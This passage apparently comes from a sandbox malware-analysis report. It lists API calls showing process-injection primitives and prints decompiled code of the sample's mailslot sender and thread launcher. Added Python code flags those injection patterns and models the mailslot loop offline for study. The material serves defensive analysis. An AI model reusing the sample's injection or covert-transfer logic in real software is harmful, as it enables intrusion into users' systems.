  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
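The entries above are the injection primitives a triage script should lift out of a report like this automatically: NtAllocateVirtualMemory with page protection 0x40 (PAGE_EXECUTE_READWRITE), NtWriteVirtualMemory in the same function as NtSetContextThread, NtCreateSection followed by NtMapViewOfSection, and, earlier on the page, RtlAdjustPrivilege(0x13), where LUID 0x13 is SeShutdownPrivilege (19), not SeDebugPrivilege (20). The parser and rule set below is an added example, not Joe Sandbox's code or the sample's. It parses the report's own "• Api.MODULE(args), ref: ADDR" lines (including "Part of subcall function" entries); the embedded sample input is a handful of those lines copied from the entries above, the rule names are this example's own, and the constant values are the ones in the public Windows headers.

```python
"""Parser and triage rules for the "APIs" lists in the report above.

Added example, not Joe Sandbox's or the sample's code.  It turns lines of the
form "  • Api.MODULE(args), ref: ADDR" (including "Part of subcall function"
entries) into records and applies a few rules that flag the injection
primitives visible in the similarity entries above.  Rule names are this
example's own; the constants come from the public Windows headers
(PAGE_EXECUTE_READWRITE = 0x40, SEC_COMMIT = 0x08000000,
SE_SHUTDOWN_PRIVILEGE = 19, SE_DEBUG_PRIVILEGE = 20).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

LINE_RE = re.compile(
    r"^\s*[•*\-]\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{1,8}")

PAGE_EXECUTE_READWRITE = 0x40
SEC_COMMIT = 0x08000000
PRIVILEGES = {19: "SeShutdownPrivilege", 20: "SeDebugPrivilege"}
# index of the page-protection argument in each allocator's listing
PROTECT_ARG = {"NtAllocateVirtualMemory": 5, "VirtualAlloc": 3, "VirtualAllocEx": 4}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an integer, or None if it is missing, '?' or a string."""
        if i >= len(self.args) or not HEX_RE.fullmatch(self.args[i]):
            return None
        return int(self.args[i], 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in `text`; lines that do not match are skipped.

    Arguments are split on ',', which is enough for the string literals in this
    report (none contains a comma) but would need a quote-aware split otherwise.
    """
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def triage(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Return {rule: [evidence, ...]} for the injection-related patterns."""
    hits: Dict[str, List[str]] = {}

    def hit(rule: str, evidence: str) -> None:
        hits.setdefault(rule, []).append(evidence)

    for c in calls:
        where = f"{c.api} at {c.ref:08X}"
        if c.api in PROTECT_ARG and c.arg_int(PROTECT_ARG[c.api]) == PAGE_EXECUTE_READWRITE:
            hit("rwx_allocation", f"{where}: PAGE_EXECUTE_READWRITE")
        if (c.api == "NtCreateSection" and c.arg_int(4) == PAGE_EXECUTE_READWRITE
                and c.arg_int(5) == SEC_COMMIT):
            hit("rwx_section", f"{where}: RWX section (SEC_COMMIT)")
        if c.api == "RtlAdjustPrivilege":
            luid = c.arg_int(0)
            name = PRIVILEGES.get(luid, f"privilege LUID {luid}")
            state = "enable" if c.arg_int(1) == 1 else "disable"
            hit("privilege_adjust", f"{where}: {state} {name}")

    names = {c.api for c in calls}
    for pair in (("NtWriteVirtualMemory", "NtSetContextThread"),
                 ("WriteProcessMemory", "SetThreadContext")):
        if set(pair) <= names:
            hit("thread_context_injection", f"{pair[0]} and {pair[1]} in the same function")
    if {"NtCreateSection", "NtMapViewOfSection"} <= names:
        hit("section_mapping", "NtCreateSection and NtMapViewOfSection in the same function")
    return hits


# Constructed input: lines copied from the API lists in the entries above.
SAMPLE = """\
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
"""

if __name__ == "__main__":
    for rule, evidence in triage(parse_api_lines(SAMPLE)).items():
        print(rule, "->", "; ".join(evidence))
```

Run on the whole "APIs" block of one entry at a time: the co-occurrence rules are meant per function, and feeding the entire report in one go would pair calls from unrelated functions.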
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed; 0x736c6e70 is "pnls" in little-endian ASCII
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed; E004010FB is the mailslot sender decompiled below
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed; wait for the sender thread to finish
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4); // sender failed: kill the first thread and return its error code
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed; both threads succeeded (VirtualAlloc subcall, see APIs below)
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					// GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING: open the client end of the mailslot
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2); // ERROR_FILE_NOT_FOUND: keep polling every 100 ms until the slot exists
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed; on success _a4 holds the buffer to send and _v24 its length
				if(_t34 == 0) {
					_v12 = 0xb; // ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000; // at most 0x1000 bytes per mailslot message
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40; // never cleared again, even if a later retry succeeds
						if(_t40 != 0x79) { // only ERROR_SEM_TIMEOUT is retried
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							// last message was a full chunk: resend its final byte as a separate 1-byte message
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // wipe the sent bytes before freeing the buffer
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
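The decompiled E004010FB above is the client half of a mailslot transfer: it polls CreateFileA on \\.\mailslot\msl0 until the slot exists, then pushes the buffer in 0x1000-byte messages with a 100 ms pause after every write attempt. Two details are easy to miss in the decompiled form. First, when the payload length is an exact multiple of 0x1000 the loop resends the last byte as a separate 1-byte message, so the final message is always shorter than 0x1000, and a receiver that simply concatenates messages ends up with one duplicated byte. Second, _v12 is set on an ERROR_SEM_TIMEOUT retry but never cleared on the following success, so the thread's exit code is 0x79 whenever any write timed out, which E00401639 above then treats as a failure and answers with TerminateThread on the other thread. The model below is an added example, not code from the sample or from Joe Sandbox; it re-implements the decompiled loop against a constructed in-memory transport (FakeMailslot, an assumption) so both behaviours can be checked offline.

```python
"""Pure-Python model of the mailslot client loop decompiled above (E004010FB).

Added example, not code from the sample or from Joe Sandbox: the decompiled
control flow is re-implemented against a constructed in-memory transport so
the framing can be inspected offline.  Constants are the ones in the
decompiled function: 0x1000-byte chunks, Sleep(0x64) after every write
attempt, retry only on Win32 error 0x79 (ERROR_SEM_TIMEOUT), and polling the
open while it fails with error 2 (ERROR_FILE_NOT_FOUND).  The receiver is not
on the page; reassemble_naive() is an assumption used only to expose the
end-of-stream quirk.
"""
from typing import Callable, List, Optional, Tuple

CHUNK = 0x1000
ERROR_FILE_NOT_FOUND = 2
ERROR_SEM_TIMEOUT = 0x79
SLEEP_SECONDS = 0x64 / 1000.0


class Win32Error(Exception):
    def __init__(self, code: int) -> None:
        super().__init__(code)
        self.code = code


class FakeMailslot:
    """Constructed stand-in for the client handle on the msl0 mailslot.

    The first `not_found_polls` opens fail with ERROR_FILE_NOT_FOUND, the first
    `timeouts` writes fail with ERROR_SEM_TIMEOUT, and `fatal`, if set, makes
    every write fail with that code.
    """

    def __init__(self, not_found_polls: int = 0, timeouts: int = 0,
                 fatal: Optional[int] = None) -> None:
        self.messages: List[bytes] = []
        self._not_found = not_found_polls
        self._timeouts = timeouts
        self._fatal = fatal

    def open(self) -> None:
        if self._not_found:
            self._not_found -= 1
            raise Win32Error(ERROR_FILE_NOT_FOUND)

    def write(self, data: bytes) -> int:
        if self._fatal is not None:
            raise Win32Error(self._fatal)
        if self._timeouts:
            self._timeouts -= 1
            raise Win32Error(ERROR_SEM_TIMEOUT)
        self.messages.append(data)
        return len(data)


def open_like_sample(slot: FakeMailslot,
                     sleep: Callable[[float], None] = lambda _s: None) -> int:
    """The CreateFileA loop: poll every 100 ms while the slot does not exist yet."""
    while True:
        try:
            slot.open()
            return 0
        except Win32Error as e:
            if e.code != ERROR_FILE_NOT_FOUND:
                return e.code          # any other open error is returned as-is
            sleep(SLEEP_SECONDS)


def send_like_sample(payload: bytes, slot: FakeMailslot,
                     sleep: Callable[[float], None] = lambda _s: None) -> Tuple[int, int]:
    """The WriteFile loop; returns (last_error, final_offset) as the decompiled code would."""
    off = 0                    # _v8
    remaining = len(payload)   # _t46
    err = 0                    # _v12
    while True:
        n = min(remaining, CHUNK)  # _v16: at most one 0x1000-byte message per write
        try:
            n = slot.write(payload[off:off + n])
        except Win32Error as e:
            err = e.code
            if err != ERROR_SEM_TIMEOUT:
                break              # fatal error: leave without the sleep
            # timeout: the same chunk is retried after the sleep; err is NOT
            # cleared by a later success, so the caller still sees 0x79
        else:
            off += n
            remaining -= n
            if remaining == 0 and n == CHUNK:
                # the last message was a full chunk: resend its final byte on its
                # own so that the final message is always shorter than CHUNK
                remaining += 1
                off -= 1
        sleep(SLEEP_SECONDS)
        if remaining == 0:
            break
    return err, off


def message_sizes(slot: FakeMailslot) -> List[int]:
    return [len(m) for m in slot.messages]


def reassemble_naive(slot: FakeMailslot) -> bytes:
    """Assumed receiver that just concatenates messages (not on the page)."""
    return b"".join(slot.messages)


if __name__ == "__main__":
    slot = FakeMailslot()
    data = bytes(range(256)) * 32          # 0x2000 bytes: an exact multiple of CHUNK
    print(send_like_sample(data, slot), message_sizes(slot))  # (0, 8192) [4096, 4096, 1]
```

Because a genuine 1-byte tail (payload length 0x1000·k + 1) produces the same message sizes as the duplicated byte, the receiver cannot tell the two apart from the framing alone and must know the length from elsewhere; the page does not show that side, so treat the concatenating receiver here as nothing more than a way to make the quirk visible.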
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
